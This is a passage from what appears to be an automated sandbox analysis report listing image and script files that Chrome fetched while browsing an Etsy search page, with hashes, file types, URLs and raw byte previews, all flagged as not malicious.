                                                                                                                                                                              Preview:....ftypavif....avifmif1miaf....meta.......!hdlr........pict.................pitm........."iloc....D@.................. <...#iinf..........infe........av01....jiprp...Kipco....colrnclx...........av1C........ispe.......T........pixi............ipma................. Dmdat....."*p...h4 2.@.....a@....?Y.B......e.2PM.q4...A.|.].U0..>...&Y:..T0B)J....rU..A.P./{tMD.1....7..Z.G...I...,............v.R4.........xW\.{Z.........O0..?...W.l.2.a..?.pn..1Y`.......&...........=.p".(8..;.f......,<.y...u.]....p1..m+..#f?&.v}.8.r../!X... .f&X.~.3......1...@..s.....y......$....M7A..j|..cY..[..$b..bX...YX."........=.@x.4W..l.e....?E-1.....c.X.-.E\.xB.~....?y.....~C4.......].".X....a.y;B.....9g...<.%.*Pkt.|.F...e..C.p.....#Y.....o/...~....Me.i...~..@.....,!..U*.UrV..&-..x..a...X|3.(,X.....j.j^.p..'w.....D.....#Yg.*?..0{8..$Uyaw\..(.Cy..m.....y...../....G.[...'I...j...5v..Q.V..s.......Lt..`......J..d..~....W....}...0../.J...o.BQR...G[T.Rcw4....=.(.....PA.&h...`K.m.An...w.
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 340x270, components 3
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):23704
                                                                                                                                                                              Entropy (8bit):7.946538980340218
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:28A60E0D6B1B5B7C27D10F19883DD897
                                                                                                                                                                              SHA1:D98602D619950B9E8C28CE45386320DEAB3FF891
                                                                                                                                                                              SHA-256:02C2E460339B95151725599990C766A1628DFC5781D14E7CC9C64010E2E9A14B
                                                                                                                                                                              SHA-512:CE1512F71CEFCBBDFCB81AA01F863B6DDA42720F763764A955FA08C39C32ECE9290A2CE7080CF80636A9B67245677A6CB695FF0932CC49D08B8DAFED963A92F7
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:......JFIF..............ICC_PROFILE.......lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc.......^cprt...\....wtpt...h....bkpt...|....rXYZ........gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2..................................................................................text....FB..XYZ ...............-XYZ ...........3....XYZ ......o...8.....XYZ ......b.........XYZ ......$.........curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0.....C............................................ .... %...%-))-969KKd...C............................................ .... %...%-))-969KKd........T..".........................................E........................!..1A..Qa"q...2..#B...3Rbr..$C....Ss.4D...................................4.......................!1.AQ.a."q..2B.......#R.c..............?... ..X8PG.%...~.JrH....p....V0T.Q..Q...,x......?J<&..0S..`.......zi..$....q.
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 600x600, components 3
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):86276
                                                                                                                                                                              Entropy (8bit):7.9764770935325595
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:47A0A1188C92097FBB7A66483ADC52C9
                                                                                                                                                                              SHA1:BEC9C123E150B9E5D2EAA9D5A3CB5417811FA30D
                                                                                                                                                                              SHA-256:50FB456164CBBD11F8969AB846BE6930DC081A5EF064B9E2E17D3926F254DB39
                                                                                                                                                                              SHA-512:0AD6CB6C65E1A2E838289868CFBB970ABB15A05ECA26999FFAB1FA9510876CC10A7797F9775183C28C0F7DC477ACA77CF20E0BE17B2B42CB96B11AC8D8C7689A
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:......JFIF..............ICC_PROFILE.......lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc.......^cprt...\....wtpt...h....bkpt...|....rXYZ........gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2..................................................................................text....FB..XYZ ...............-XYZ ...........3....XYZ ......o...8.....XYZ ......b.........XYZ ......$.........curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0.....C............................................ .... %...%-))-969KKd...C............................................ .... %...%-))-969KKd......X.X..".........................................C........................!1A.."Qa.q2....#B..Rb...3r..$...C..S..4.................................8.....................!.1A..Qaq."2....B...#3R...$Sr..b.............?..<.<..r3..{........U9'.....D....g.....Zp.@..t......b.9.?.$.F....'"(-..)....hQ@
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 600x600, components 3
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):29808
                                                                                                                                                                              Entropy (8bit):7.943304004388259
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:1198506CD0AF0BAF3C0DDFCE1077A071
                                                                                                                                                                              SHA1:18EDA29D1EF3B67A96EBB5321C5D81C77B8F8C7F
                                                                                                                                                                              SHA-256:D8B98E1584931132340B54A1C81900BB1903D67F62CC024C0AA431DD2AAFDB83
                                                                                                                                                                              SHA-512:56813F8FB41B759220DFB5906CA50AF2FA266109191B6959FDA6E78904257D7CC5E71A9CCEDBC6706844ED012E4E452F6EBF5A89F59C6A5B320A033B8914A4B5
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:......JFIF..............ICC_PROFILE.......lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc.......^cprt...\....wtpt...h....bkpt...|....rXYZ........gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2..................................................................................text....FB..XYZ ...............-XYZ ...........3....XYZ ......o...8.....XYZ ......b.........XYZ ......$.........curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0.....C............................................ .... %...%-))-969KKd...C............................................ .... %...%-))-969KKd......X.X.."........................................C.......................!1..AQa.."q.2.#B....R..3b...$4.Cr....%&Sst...............................7......................!1..AQa"q..2.3B..#..Rbr..c.................?..A.H~.j%X>......JH......{..1..-....C.mJI.....+.|".I../S)+.....r.ccB.....U.C...X..j.
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 340x270, components 3
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):17584
                                                                                                                                                                              Entropy (8bit):7.933290888840803
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:CD08DB273BC137CFDCAF5144AE10643C
                                                                                                                                                                              SHA1:0821377149501681C2FD34303CDA06D762CB9799
                                                                                                                                                                              SHA-256:37B1845FB12AB8E4C3E334B53D5E245F51A792B649EE01885DB4C88E702EBC8A
                                                                                                                                                                              SHA-512:D025C5054102840CF0D1A771E692336D5B08F1A853FD354B028CEC9772EBB97486B387FF4EAFFC0054ED242F9475FF75FF05B7F4862C77A1C46E23FCE7CFD1C5
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:......JFIF..............ICC_PROFILE.......lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc.......^cprt...\....wtpt...h....bkpt...|....rXYZ........gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2..................................................................................text....FB..XYZ ...............-XYZ ...........3....XYZ ......o...8.....XYZ ......b.........XYZ ......$.........curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0.....C............................................ .... %...%-))-969KKd...C............................................ .... %...%-))-969KKd........T..".........................................M........................!..1A.."Qaq..2B...#3R..br....$CD.....&4EScs...5.T.................................4.......................!1.A2Qq.."a..3BR..#4T....Sr............?..T(..X..4Tt.i..*3LM4V.K4.$QD..H....e....7$..@.....Mqq2C.1..K#.DE.,...u5....
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:ISO Media, AVIF Image
                                                                                                                                                                              Category:downloaded
                                                                                                                                                                              Size (bytes):11288
                                                                                                                                                                              Entropy (8bit):7.967513757862808
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:6C0AD2DF795E1D4AED4E2159CFB8B570
                                                                                                                                                                              SHA1:F3B16A828334060A3E4BF4B85129DDEB3F6B36EB
                                                                                                                                                                              SHA-256:3FE9C94B1BC720CA1E1F2DC224FF255E55ABE4D124BBDD54250618898C813D08
                                                                                                                                                                              SHA-512:0F7AD4C29DB0FE129AC9DD8325D947D382A744500FBD1C65CD2554C511E95C89690B1901D64E3EC887F426DF5D01CC4BDD5EFAB1B6135F54858E45FD752A7357
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              URL:https://i.etsystatic.com/18152467/c/1824/1448/0/1132/il/fb2243/5261631870/il_340x270.5261631870_q663.jpg
                                                                                                                                                                              Preview:....ftypavif....avifmif1miaf....meta.......!hdlr........pict.................pitm........."iloc....D@..................+....#iinf..........infe........av01....jiprp...Kipco....colrnclx...........av1C........ispe.......T........pixi............ipma.................+.mdat....."*p...h4 2.U.....1@..x..... (...PKw....G.......".r....sa...P.L'A..zU.....+H..8..iFD......Zy{.Y...j.y.p_..79......n..1bla./_.%.y.....8D88d..C}z.J%...../I2.>..^b.c...6....A!.7....K........~)qp........3c...`....f.T.>..|Z+......G....7.90F..k..!....p..e.0...b.....M..5..z....... x..Hz....l...O..G..=S..}.g.../...p@;.4V.I.z.\.K..vt...V..AU......).Q.2m.ax.....3...+.....\;p.-S..eVO..`.`.l.p.......U7.%....i[.~..`...~s]..B.I:.G P....`.....Gv..%................CR......A.It..P.C...{...`.6L{...'.T.......x..h...-u[.l.8>.=..R+\.....gS.......a.........D.7..q..u.5.P..Ms.z]E.jD[...^.4.B>.VS......2....@..E=]p7..................-.'..>..$.v.5........s+...i..._]v.gx.O./9..;.... /....J.G..1..8.......'..(I
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:Unicode text, UTF-8 text, with very long lines (41625)
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):150620
                                                                                                                                                                              Entropy (8bit):5.404759527268419
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:707D2441020D21C1A4992E879C8BE91F
                                                                                                                                                                              SHA1:EBE5D7846E6125BAAEC14D36E0AA553ED8A82E82
                                                                                                                                                                              SHA-256:7263C4508D7B37B27C45C5B54F4839CE8574AE63032D7ACE5E15412859E6B9FC
                                                                                                                                                                              SHA-512:C37D41B045EF4A57470D1C89D8365620ACFA332AE6FDB698516921CCCCC7482E96DB0211C76FD68E20412B34FA1E77530E83EE69A1F2BBD4E7834E2C2064AF94
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:/* https://hcaptcha.com/license */.!function(){"use strict";function e(e){var t=this.constructor;return this.then((function(n){return t.resolve(e()).then((function(){return n}))}),(function(n){return t.resolve(e()).then((function(){return t.reject(n)}))}))}function t(e){return new this((function(t,n){if(!e||"undefined"==typeof e.length)return n(new TypeError(typeof e+" "+e+" is not iterable(cannot read property Symbol(Symbol.iterator))"));var r=Array.prototype.slice.call(e);if(0===r.length)return t([]);var i=r.length;function o(e,n){if(n&&("object"==typeof n||"function"==typeof n)){var a=n.then;if("function"==typeof a)return void a.call(n,(function(t){o(e,t)}),(function(n){r[e]={status:"rejected",reason:n},0==--i&&t(r)}))}r[e]={status:"fulfilled",value:n},0==--i&&t(r)}for(var a=0;a<r.length;a++)o(a,r[a])}))}var n=setTimeout,r="undefined"!=typeof setImmediate?setImmediate:null;function i(e){return Boolean(e&&"undefined"!=typeof e.length)}function o(){}function a(e){if(!(this instanceof
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 600x600, components 3
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):71139
                                                                                                                                                                              Entropy (8bit):7.963940358648189
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:A95570929627DBEA00A63E2C84FEFFFA
                                                                                                                                                                              SHA1:D9D47B4AE91DF557135FF84F89097E0B547FB322
                                                                                                                                                                              SHA-256:8E70CC7538840D6DF29A52B466073BCE8FAF83C2317934D81CF7E8FAB8396681
                                                                                                                                                                              SHA-512:88BC0A12EE9872BACA6404974A4DB75C57AB00E9DCB566ECDFDC4C617BFD68A956E3432AEA9019AAC0081A380740596DD718EF273A92B7D29F15FB5624553379
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:......JFIF..............ICC_PROFILE.......lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc.......^cprt...\....wtpt...h....bkpt...|....rXYZ........gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2..................................................................................text....FB..XYZ ...............-XYZ ...........3....XYZ ......o...8.....XYZ ......b.........XYZ ......$.........curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0.....C............................................ .... %...%-))-969KKd...C............................................ .... %...%-))-969KKd......X.X..".........................................L........................!1.A.."Qaq..2...#B..3R...br....$4C..%S5Dc..ETUs....................................<.......................!.1AQa..q"..2R..#Bb......3..$r..%S.............?......9=.j;............&..Iuy$<.=.k>..z........[[.....r}..WrC.
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:ASCII text, with very long lines (5245), with no line terminators
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):5245
                                                                                                                                                                              Entropy (8bit):5.9156531950200115
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:92A77604F52D628D11BAB66B6F1CA773
                                                                                                                                                                              SHA1:61F262701E8F363B51A1F045E341915B865A4066
                                                                                                                                                                              SHA-256:B6049B5EEA88CD2AE4FFAD71043603DB3EAD5C8A16A3B841FC76AAC9F483D322
                                                                                                                                                                              SHA-512:3F06D09444D4F15CFB7DE69382D3093A936F6C27C0CFE0CA94357C9CBACEE8C7B3064F692902A52AF258B078E400A17D52C24BF11CC9793E36891325F6BC8E18
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:(function(){var s = {};(function(){var h=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,d){if(a==Array.prototype||a==Object.prototype)return a;a[b]=d.value;return a};function k(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var d=a[b];if(d&&d.Math==Math)return d}throw Error("Cannot find global object");} var m=k(this),p=typeof Symbol==="function"&&typeof Symbol("x")==="symbol",t={},v={};function w(a,b,d){if(!d||a!=null){d=v[b];if(d==null)return a[b];d=a[d];return d!==void 0?d:a[b]}} function x(a,b,d){if(b)a:{var c=a.split(".");a=c.length===1;var e=c[0],g;!a&&e in t?g=t:g=m;for(e=0;e<c.length-1;e++){var f=c[e];if(!(f in g))break a;g=g[f]}c=c[c.length-1];d=p&&d==="es6"?g[c]:null;b=b(d);b!=null&&(a?h(t,c,{configurable:!0,writable:!0,value:b}):b!==d&&(v[c]===void 0&&(a=Math.random()*1E9>>>0,v[c]=p?m.Symbol(c):"$jscp$"+a+"$"+c),h(g,v[c],{co
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:ISO Media, AVIF Image
                                                                                                                                                                              Category:downloaded
                                                                                                                                                                              Size (bytes):55697
                                                                                                                                                                              Entropy (8bit):7.995747893833539
                                                                                                                                                                              Encrypted:true
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:C30F40905F7A437BE0582485D673AAE3
                                                                                                                                                                              SHA1:32AD753E11D6A648C14F70F5E6D413C16181C0F9
                                                                                                                                                                              SHA-256:C42878AE99A5EAC4F09BA22B5D429F44CEF603D30505C57AA68D162C7EE9560D
                                                                                                                                                                              SHA-512:3B6D0DDA3EC99103B688E5D9BA0D64AED42D9F6B41161C1A9EA60B736F68B926FC68A1A43A0B6BF880C6F1B46331BEB48CF8E9575154860B3A06111918AB29C6
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              URL:https://i.etsystatic.com/iap/30228a/5473069638/iap_600x600.5473069638_ef0dynm8.jpg?version=0
                                                                                                                                                                              Preview:....ftypavif....avifmif1miaf....meta.......!hdlr........pict.................pitm........."iloc....D@......................#iinf..........infe........av01....jiprp...Kipco....colrnclx...........av1C........ispe.......X...X....pixi............ipma..................mdat.....&ey_.....2.......a@.....v.....P.6.)\.>.k.....9.u.k...R..x....`.F..p......Fu.".2c.D..o....Y]..b9...o.4..p..>.$..4...$0...W.........\.y.~.a.wO.o......./..Q*m..%.W.R.sDZ@..B...t......X.......-......7..B^.rQ...Hnqh.H.Uy\.....^..*.^:.9.\N..q.G.j[.....<K@..^.........3..9.6..j....r./...s#.4.6ZmC..8..F.{b..>5O..............W..Q.n... ...._../.O_5Ox..a...;6..I...uE.?.9.<8TYp.. j.Qi...-m.H7....9..9..,.E..d..0.,}7J7.t......j....iQ.b.....5.O..!.M..F...P6...*T.c.(.D.(..g.7.7.o..f\=.1....]&.YT....DN....*.o:W\(G.[...T........)..5.*9..(}s..Y<..\.l.L......$.@.).......o..M..."B.....+..m....Q..x...I.-.e.{.?../.....s...M6.."......Vxdqn....b.`.:4....h;...y@o.%..0d...Rf..:.U.C...x...y..n?Jd_]....kPLb.
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 600x600, components 3
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):101842
                                                                                                                                                                              Entropy (8bit):7.970062652527535
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:007947B91B814F1847305038E13C5194
                                                                                                                                                                              SHA1:30D1E2272DDBB741BBAAA4A3DA57D7E7716785DE
                                                                                                                                                                              SHA-256:62909627127C663F6ECBE6A8BADFF5B9F474A354B725BC33F132925C8936EAC0
                                                                                                                                                                              SHA-512:ED830FB06D2B168DA8C931C5E69A4A0A275A7FB3BE03315DA21937B5A7F9B70C2893F5DE7CA065DC13527FB564CAA11D6B5406C70FE21674C3D0410EFDE9C194
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:......JFIF..............ICC_PROFILE.......lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc.......^cprt...\....wtpt...h....bkpt...|....rXYZ........gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2..................................................................................text....FB..XYZ ...............-XYZ ...........3....XYZ ......o...8.....XYZ ......b.........XYZ ......$.........curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0.....C............................................ .... %...%-))-969KKd...C............................................ .... %...%-))-969KKd......X.X..".........................................M.........................!1.."AQaq....2...#BR..3b..$r..4CS....%s...DEc5.TU..................................?........................!.1AQ..a."2q...BR.#....CS.$br...3c...............?..O#..8.PQ.9i..L.....b.!B..9...*.8......1.s;M..2.....5.N..A
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:ASCII text, with very long lines (5661), with no line terminators
                                                                                                                                                                              Category:downloaded
                                                                                                                                                                              Size (bytes):5661
                                                                                                                                                                              Entropy (8bit):5.955483066442608
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:6278E084ED3FC1CB825690278257D0C5
                                                                                                                                                                              SHA1:13DC568A5B196FB80ABE74DACB20852B60A9BD3E
                                                                                                                                                                              SHA-256:15C25C045D4FE7567935635D79ACB0DCF177CCEC67155D4D6FB9AAEDBF241D0F
                                                                                                                                                                              SHA-512:AFD9AF62906977D57F454E70C1072A126DE99180D20490E1309B6949273FA6ADEF5C82A415E9DE102566D1814385DD2DE57F052C4881187C85097641847435BA
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              URL:https://www.googleadservices.com/pagead/conversion/658194373/?random=1729505296451&cv=11&fst=1729505296451&bg=ffffff&guid=ON&async=1&gtm=45be4ah0v870186735z86935543za201zb6935543&gcs=G111&gcd=13t3t3t3t5l1&dma=0&tag_exp=101686685~101794736&u_w=1280&u_h=1024&url=https%3A%2F%2Fwww.etsy.com%2Fsearch%3Fq%3Dfelt%2Bdecor%26anchor_listing_id%3D865548874%26ref%3Dhp_bubbles_Trends_102124%26mosv%3Dsese%26moci%3D1291516025914%26mosi%3D1309216611844%26is_merch_library%3Dtrue%26dd_referrer%3Dhttps%253A%252F%252Fwww.etsy.com%252F&ref=https%3A%2F%2Fwww.etsy.com%2Fsearch%3Fq%3Dfelt%2Bdecor%26anchor_listing_id%3D865548874%26ref%3Dhp_bubbles_Trends_102124%26mosv%3Dsese%26moci%3D1291516025914%26mosi%3D1309216611844%26is_merch_library%3Dtrue&label=XwNfCLSf5dkDEMX_7LkC&hn=www.googleadservices.com&frm=0&tiba=Felt%20decor%20-%20Etsy&value=0&bttype=purchase&npa=0&pscdl=noapi&auid=2084024919.1729505276&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&capi=1&data=ads_data_redaction%3Dfalse&rfmt=3&fmt=4
                                                                                                                                                                              Preview:(function(){var s = {};(function(){var h=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,d){if(a==Array.prototype||a==Object.prototype)return a;a[b]=d.value;return a};function k(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var d=a[b];if(d&&d.Math==Math)return d}throw Error("Cannot find global object");} var m=k(this),p=typeof Symbol==="function"&&typeof Symbol("x")==="symbol",t={},v={};function w(a,b,d){if(!d||a!=null){d=v[b];if(d==null)return a[b];d=a[d];return d!==void 0?d:a[b]}} function x(a,b,d){if(b)a:{var c=a.split(".");a=c.length===1;var e=c[0],g;!a&&e in t?g=t:g=m;for(e=0;e<c.length-1;e++){var f=c[e];if(!(f in g))break a;g=g[f]}c=c[c.length-1];d=p&&d==="es6"?g[c]:null;b=b(d);b!=null&&(a?h(t,c,{configurable:!0,writable:!0,value:b}):b!==d&&(v[c]===void 0&&(a=Math.random()*1E9>>>0,v[c]=p?m.Symbol(c):"$jscp$"+a+"$"+c),h(g,v[c],{co
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:ISO Media, AVIF Image
                                                                                                                                                                              Category:downloaded
                                                                                                                                                                              Size (bytes):85976
                                                                                                                                                                              Entropy (8bit):7.997401570321803
                                                                                                                                                                              Encrypted:true
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:E021ACC527D90164E0CAC8537EAC5029
                                                                                                                                                                              SHA1:3479FE520196FE0EA7D8233AA0D180827893FF09
                                                                                                                                                                              SHA-256:513FAFCD256E9F31997634B90AB4920F0183B8A244562C342879ADF1D5562560
                                                                                                                                                                              SHA-512:34F8C3FD57CC7AB5F6CF97B5A76C67676AC292A102ED0EA15B0B5B095482E07A8ADAA3D4DC1A274D762F19C3FC2CB96096CC03AA4EE6239B28B7D2F6FDDF985A
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              URL:https://i.etsystatic.com/iap/c7a26f/6045669718/iap_600x600.6045669718_2vndxord.jpg?version=0
                                                                                                                                                                              Preview:....ftypavif....avifmif1miaf....meta.......!hdlr........pict.................pitm........."iloc....D@..................N....#iinf..........infe........av01....jiprp...Kipco....colrnclx...........av1C........ispe.......X...X....pixi............ipma.................N.mdat.....&ey_.....2........1@..'.5...$.Z.9....?.7..dbm.".z...k."wjb_wA..@..~....G.a...C..Pd.(..~.w[x..GX.[..........K.=....7....sa...I.sY$.....LS..i,..9...................B....Gb....n-.,>.)vA..@p.y..!.^2...g.(.A....p..mH.(.#M.w..lI.}...<.3.D..H..W.e_<..].[.&.:.X....k..........-^."..1......{..u.._.M...G....7....rT.=...fv&......o]A..[F....8.....*..5./e...kwS*.....im#.[.=.....C..4....."...e...J$.R.2.E].X.>.V`.Y...H.....f..t...C..([x...g...(ky-(.\.6.;.+.+..)..~........r...*_.'...=..#..w......Px*T3...@...R.m.0.......fB.....Y..."}E1..}.)ti.j...N....9E'.....<....4+...Vx.6LD..h..]Ua..o.e.6..~...SbM.....e.......#u...s....M.....|...S"...y...".6.Gb.&....0.A.|..*....+...j.....NGI6...SS..^...m.`.
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 300x300, components 3
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):15384
                                                                                                                                                                              Entropy (8bit):7.915816919204369
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:87D6E13A5E5CF18D849C10D577A886CB
                                                                                                                                                                              SHA1:6BC5222EE50390285F75368C0B03170EB2B44F40
                                                                                                                                                                              SHA-256:CD50F9B676237D8D7A61ADF8F98266037D452451C296B6115D6CB3BF3CB46BAE
                                                                                                                                                                              SHA-512:F9C5B782F77F213E9CB29A545DAC19C34A837C09B81F1236FBB099B8E929323C4BFC130E4BCE965D46E033B1359FCB0C1A52C52678491B603003F499FAAFAC5C
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:......JFIF..............ICC_PROFILE.......lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc.......^cprt...\....wtpt...h....bkpt...|....rXYZ........gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2..................................................................................text....FB..XYZ ...............-XYZ ...........3....XYZ ......o...8.....XYZ ......b.........XYZ ......$.........curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0.....C.................................................."..."*%%*424DD\...C.................................................."..."*%%*424DD\......,.,..".........................................G.........................!1.AQ.aq..."2..#BRb....Cr...$3S..DTs.....Ec..................................@.........................!1AQa.."q..2R...#r..3Bb..C....4D....S............?..`.U.[e...}^.Gre...r`..5P..m.$...IK5]DT..H...{.......2..J..
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:ISO Media, AVIF Image
                                                                                                                                                                              Category:downloaded
                                                                                                                                                                              Size (bytes):57859
                                                                                                                                                                              Entropy (8bit):7.995688876749854
                                                                                                                                                                              Encrypted:true
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:13C9A8FB884D53C58F7C909E34A74F42
                                                                                                                                                                              SHA1:45CE95F468B7226A7800419019559E07A8ABF5E6
                                                                                                                                                                              SHA-256:1DFC28725F326812896CE12C64602677E2EE1F4924BBA5E99B34CD4F3FCBE8C8
                                                                                                                                                                              SHA-512:2F610A6D7D86D577827DDECFB75CDF5D990DB29B94895C538E571E7EBABA7F658DBB12F5FAF4801B751C8D37FE603697ADD9E73EC29CEF0540834BC85008FFAA
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              URL:https://i.etsystatic.com/iap/a4ec0f/6024473444/iap_600x600.6024473444_ey1kw7xy.jpg?version=0
                                                                                                                                                                              Preview:....ftypavif....avifmif1miaf....meta.......!hdlr........pict.................pitm........."iloc....D@.......................#iinf..........infe........av01....jiprp...Kipco....colrnclx...........av1C........ispe.......X...X....pixi............ipma...................mdat.....&ey_.....2.... ...A@..*..<.A.f..0.... ..}I.b.bB..i..V......!..8..5.#(..5..8n.Cc+...v?.V'.../....S@\1.o#_...B..Z...+.Z..'..M......."......).(:O.3.$....".i>......k.D.[.._..5....^D\H.`&.y..?...\...~^rH[...v..nP.](..;....;....0$.......Sb@.|.1.....j...N..>w*.I..7?.#..U..#Z&1.T..{...w4....)h 9.0.....C.u?7....Q.u.u$..G#..Z.p..E..'].ho.!.....1Q3..;}8i..'.tE@....N..3t..:Xl]..N...2a..Xv'..L...@Bw...r............X".=?Tv..=.*..../Y.....Ye..6.C.eGU.AE2...L....d.<.H...t.g.w....~.N.S)....<AU7bV`.[VU.....:...l<.....p:.K}M|..L1..50#..K....l{...X;........x....zS[.9(R..U...kN....N.3.?h....Y.Hy.e/......-.....o!Q. M....TLz...-oM...SP2..m...h...j....@v..'.E#.....2....;MH...-.G.;.&.a...A$&..P.`.....>...H.
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:ASCII text, with very long lines (52360)
